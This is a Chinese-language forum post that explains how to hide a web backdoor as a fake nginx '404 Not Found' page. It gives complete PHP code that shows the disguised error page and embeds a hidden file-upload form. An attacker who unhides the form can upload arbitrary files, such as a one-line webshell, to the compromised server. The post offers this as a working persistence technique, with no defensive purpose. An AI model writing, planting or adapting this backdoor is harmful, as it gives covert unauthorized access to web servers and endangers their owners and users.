admin 发表于 2021-4-8 22:04:33

404后门shell

所谓404就是指,当用户访问某个页面时。由于该页面移动或者删除,用户无法访问时会通过404错误页面反馈用户。
我们便可以利用这一点达到隐藏后门的目的!
如下:是我们常常看到的一种404页面!

对页面审查元素我们再来看看!


删掉hidden属性,这时我们便可以用404页面来上传一句话!


404代码


<?php

$int=1;

if($int==1){

echo "

<html>

<head><title>404 Not Found</title></head>

<body>

<center><h1>404 Not Found</h1></center>

<hr><center>nginx</center>

</body>

</html>

<!-- a padding to disable MSIE and Chrome friendly error page -->

<!-- a padding to disable MSIE and Chrome friendly error page -->

<!-- a padding to disable MSIE and Chrome friendly error page -->

<!-- a padding to disable MSIE and Chrome friendly error page -->

<!-- a padding to disable MSIE and Chrome friendly error page -->

<!-- a padding to disable MSIE and Chrome friendly error page -->

";}



@$temp = $_FILES['upload_file']['tmp_name'];



@$file = basename($_FILES['upload_file']['name']);



if (empty ($file)){



echo "<form hidden action = '' method = 'POST' ENCTYPE='multipart/form-data'>\n";

echo "Local file: <input type = 'file' name = 'upload_file'>\n";

echo "<input type = 'submit' value = 'Upload'>\n";

echo "</form>\n<pre>\n\n</pre>";}

else {if(move_uploaded_file($temp,$file))

{echo "File uploaded successfully.<p>\n";}

else {echo "Unable to upload " . $file . ".<p>\n";}}

?>
页: [1]
查看完整版本: 404后门shell